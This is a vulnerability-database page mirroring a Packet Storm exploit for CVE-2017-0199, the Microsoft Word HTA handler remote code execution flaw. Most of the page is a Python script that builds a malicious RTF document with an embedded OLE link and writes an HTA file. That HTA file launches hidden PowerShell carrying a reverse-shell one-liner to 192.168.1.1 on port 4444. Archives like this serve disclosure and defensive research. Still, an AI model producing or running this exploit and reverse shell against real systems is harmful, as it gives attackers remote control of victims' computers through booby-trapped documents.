Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Word MTA Handler Remote Code Execution

🗓️ 27 Jun 2017 00:00:00Reported by Juan SaccoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 359 Views

Microsoft Word MTA Handler Remote Code Execution CVE-2017-0199, RCE vulnerability. Exploit could result in denial-of-service

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for CVE-2017-0199
24 Apr 201723:44
githubexploit
GithubExploit		Exploit for CVE-2017-0199
15 Aug 202207:15
githubexploit
GithubExploit		Exploit for CVE-2017-0199
18 Apr 201706:33
githubexploit
GithubExploit		Exploit for CVE-2017-8570
8 Apr 201810:07
githubexploit
GithubExploit		Exploit for CVE-2017-0199
23 Apr 201713:58
githubexploit
GithubExploit		Exploit for Code Injection in Microsoft
13 Sep 201715:24
githubexploit
GithubExploit		Exploit for CVE-2022-30190
21 Jan 202611:02
githubexploit
GithubExploit		Exploit for CVE-2017-0199
17 Apr 201708:10
githubexploit
GithubExploit		Exploit for CVE-2017-0199
22 Apr 201704:01
githubexploit
0day.today		Microsoft Office / WordPad Remote Code Execution Vulnerability
16 Apr 201700:00
zdt
Rows per page
`# Exploit Author: Juan Sacco at KPN Red Team  
# Developed using Exploit Pack - http://www.exploitpack.com  
<[email protected]>  
#  
# Description: Microsoft Word (CVE-2017-0199) is prone to a RCE trough  
a HTA Handler  
# A remote code execution vulnerability exists in the way that  
Microsoft Office and WordPad parse specially crafted files.  
# An attacker who successfully exploited this vulnerability could take  
control of an affected system.  
#  
# Impact: An attacker could exploit this vulnerability to execute  
arbitrary commands in the  
# context of the application. Failed exploit attempts could result in a  
# denial-of-service condition.  
#  
# Vendor homepage: http://www.microsoft.com  
#  
# Credits: @ShadowBrokerss @EquationGroup @Petya @juansacco  
  
import binascii  
def chunk_str(str, chunk_size):  
return [str[i:i+chunk_size] for i in range(0, len(str), chunk_size)]  
hta_host="" # 127.0.0.1  
for i in chunk_str(binascii.hexlify(b'http://127.0.0.1'),2):  
hta_host+= str(i+"00")  
hta_host="" # 127.0.0.1  
hta_object = "01000002090000000100000000000000"  
hta_object += "0000000000000000a4000000e0c9ea79"  
hta_object += "f9bace118c8200aa004ba90b8c000000"  
hta_object += hta_host  
hta_object += "00000000795881f43b1d7f48af2c825d"  
hta_object += "c485276300000000a5ab0000ffffffff"  
hta_object += "0609020000000000c000000000000046"  
hta_object += "00000000ffffffff0000000000000000"  
hta_object += "906660a637b5d2010000000000000000"  
hta_object += "00000000000000000000000000000000"  
hta_object += "100203000d0000000000000000000000"  
hta_object += "0"*480  
rtf_template = "{\\rtf1\\adeflang1025\\ansi\\ansicpg1252\\uc1\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi31507\\deflang1033\\deflangfe2052\\themelang1033\\themelangfe2052\\themelangcs0\r\n{\\info\r\n{\\author  
Microsoft}\r\n{\\operator Microsoft}\r\n}\r\n{\\*\\xmlnstbl {\\xmlns1  
http://schemas.microsoft.com/office/word/2003/wordml}}\r\n{\r\n{\\object\\objautlink\\objupdate\\rsltpict\\objw291\\objh230\\objscalex99\\objscaley101\r\n{\\*\\objclass  
Word.Document.8}\r\n{\\*\\objdata  
0105000002000000\r\n090000004f4c45324c696e6b000000000000000000000a0000\r\nd0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nfffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d\r\n6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000\r\n0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000\r\n00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\nffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\r\n"  
rtf_template += hta_object  
rtf_template += "0105000000000000}\r\n{\\result {\\rtlch\\fcs1  
\\af31507 \\ltrch\\fcs0 \\insrsid1979324 }}}}\r\n{\\*\\datastore  
}\r\n}\r\n"  
print("[*] Microsoft Word RCE - HTA Handler by Juan Sacco")  
file_rtf = open("exploitpack.rtf","w")  
file_rtf.write(rtf_template)  
file_rtf.close()  
print("[*] RTF File created")  
print rtf_template  
# Extra bonus PS Reverse one-liner  
ps_reverse_shell = "$sm=(New-Object  
Net.Sockets.TCPClient(\"192.168.1.1\",4444)).GetStream();[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length))  
-ne 0){;$d=(New-Object  
Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex  
$d 2>&1));$sm.Write($st,0,$st.Length)}\r\n" # Reverse to 192.168.1.1  
4444  
hta_template = "<script language=\"VBScript\">\r\nSet pwnShell =  
CreateObject(\"Wscript.Shell\") \r\nSet fsObject =  
CreateObject(\"Scripting.FileSystemObject\")\r\nIf  
fsObject.FileExists(pwnShell.ExpandEnvironmentStrings(\"%PSModulePath%\")  
+ \"..\\powershell.exe\") Then\r\n pwnShell.Run \"powershell.exe  
-nop -w hidden -e "  
hta_template += ps_reverse_shell  
hta_template += "\",0\r\nEnd If\r\nwindow.close()\r\n</script>\r\n"  
file_hta = open("exploitpack.hta","w")  
file_hta.write(hta_template)  
file_hta.close()  
print("[*] HTA File created")  
print hta_template  
print("[*] Thanks NSA!")  
print("[*] Creditz: @EquationGroup @ShadowBrokers @juansacco")  
print("[*] KPN Red team: <[email protected]>")  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Jun 2017 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.99933
microsoft wordmta handlerremote code executioncve-2017-0199rcedenial-of-service
359